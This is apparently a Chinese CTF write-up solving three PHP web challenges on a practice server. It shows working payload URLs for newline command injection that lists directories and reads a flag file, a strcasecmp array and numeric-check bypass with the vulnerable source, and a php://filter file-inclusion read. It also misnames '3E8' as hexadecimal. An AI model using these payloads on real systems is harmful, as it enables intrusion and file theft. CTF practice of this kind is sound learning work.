1.请ping我的ip 看你能Ping通吗?
我都过滤了,看你怎么绕。题目地址:http://118.190.152.202:8018
思路:命令注入
经测试,?ip=xxx的确可以做到ping
%0a截断
linux 命令:
ls /命令看根目录
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Als%20/
看到如下目录
ls -lR /home查看每个文件夹
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Als%20-lR%20/home
cat%20/home/flag查看文件
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Acat%20/home/flag
2.Please give me username and password!
题目地址:http://118.190.152.202:8017/
构造地址:http://118.190.152.202:8017/index.php?username=11&password=111
查看源代码:
<?php
error_reporting(0);
$flag = "***********";
if(isset($_GET['username'])){
if (0 == strcasecmp($flag,$_GET['username'])){
$a = fla;
echo "very good!Username is right";
}
else{
print 'Username is not right<!--index.php.txt-->';}
}else
print 'Please give me username or password!';
if (isset($_GET['password'])){
if (is_numeric($_GET['password'])){
if (strlen($_GET['password']) < 4){
if ($_GET['password'] > 999){
$b = g;
print '<p>very good!Password is right</p>';
}else
print '<p>Password too little</p>';
}else
print '<p>Password too long</p>';
}else
print '<p>Password is not numeric</p>';
}
if ($a.$b == "flag")
print $flag;
?>
1.strcasecmp遇到数组会返回NULL,null=0于是条件成立
2.password虽然只能到999,100便报错,但是可以用16进制3E8来绕
http://118.190.152.202:8017/index.php?username[]=1&password=3E8
3.你能绕过吗?
题目地址: http://118.190.152.202:8008/
文件包含漏洞:
http://118.190.152.202:8008/index.php?f=Php://filter/read=convert.base64-encode/resource=index&id=4
base64解码